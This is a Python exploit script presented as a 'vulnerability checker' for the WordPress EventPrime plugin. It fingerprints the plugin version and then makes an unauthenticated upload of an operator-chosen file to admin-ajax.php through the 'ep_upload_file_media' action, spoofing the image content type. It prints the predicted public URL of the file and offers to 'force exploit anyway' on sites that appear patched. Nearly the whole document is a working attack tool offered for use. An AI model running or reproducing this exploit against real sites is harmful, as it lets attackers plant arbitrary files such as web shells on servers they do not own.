import requests
import re
import sys
import json
import urllib3
import os
from datetime import datetime

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
CYAN = '\033[96m'
RESET = '\033[0m'
BOLD = '\033[1m'

def check_version(target_url):
    readme_path = "/wp-content/plugins/eventprime-event-calendar-management/readme.txt"
    try:
        response = requests.get(target_url + readme_path, verify=False, timeout=10)
        if response.status_code == 200:
            version_match = re.search(r"Stable tag: ([\d.]+)", response.text)
            if version_match:
                return version_match.group(1)
    except:
        pass
    return None

def is_vulnerable(version):
    if not version:
        return False

    parts = [int(p) for p in version.split('.')]
    vulnerable_until = [4, 2, 8, 4]
    
    for i in range(len(parts)):
        if i < len(vulnerable_until):
            if parts[i] < vulnerable_until[i]:
                return True
            if parts[i] > vulnerable_until[i]:
                return False
    return True

def upload_file(target_url, file_path):
    ajax_url = target_url + "/wp-admin/admin-ajax.php"
    filename = os.path.basename(file_path)
    
    print(f"{CYAN}[*] Attempting file upload...{RESET}")
    
    try:
        with open(file_path, 'rb') as f:
            files = {'file': (filename, f, 'image/jpeg')}
            data = {'action': 'ep_upload_file_media'}
            
            response = requests.post(ajax_url, data=data, files=files, verify=False, timeout=20)
            
            if response.status_code == 200:
                try:
                    res_json = response.json()
                    if res_json.get('success'):
                        print(f"{GREEN}{BOLD}[+] SUCCESS: File Uploaded!{RESET}")
                        print(f"{GREEN}[+] Attachment ID: {res_json['data']['attachment_id']}{RESET}")
                        
                        now = datetime.now()
                        year_month = now.strftime("%Y/%m")
                        final_url = f"{target_url}/wp-content/uploads/{year_month}/{filename}"
                        print(f"{YELLOW}[!] Predicted URL: {final_url}{RESET}")
                    else:
                        print(f"{RED}[-] Server rejected the file. Response: {response.text}{RESET}")
                except:
                    print(f"{RED}[-] Failed to parse JSON response.{RESET}")
            else:
                print(f"{RED}[-] HTTP Error: {response.status_code}{RESET}")
    except Exception as e:
        print(f"{RED}[-] Error during upload: {str(e)}{RESET}")

def main():

    print(f"\n{BOLD}{BLUE}=== EventPrime Vulnerability Checker ==={RESET}\n")

    if len(sys.argv) < 3:
        print(f"{YELLOW}Usage: python3 {sys.argv[0]} <url> <file>{RESET}")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    flag_file = sys.argv[2]
    
    version = check_version(target)
    
    if version:
        print(f"{CYAN}[*] Detected Plugin Version: {BOLD}{version}{RESET}")
        
        if is_vulnerable(version):
            print(f"{RED}{BOLD}[!] STATUS: VULNERABLE!{RESET}")
            upload_file(target, flag_file)
        else:
            print(f"{GREEN}[+] STATUS: NOT VULNERABLE (Safe Version){RESET}")
            choice = input(f"{YELLOW}[?] Force exploit anyway? (y/n): {RESET}").lower()
            if choice == 'y':
                upload_file(target, flag_file)
    else:
        print(f"{YELLOW}[!] Could not detect version. Trying anyway...{RESET}")
        upload_file(target, flag_file)

if __name__ == "__main__":
    main()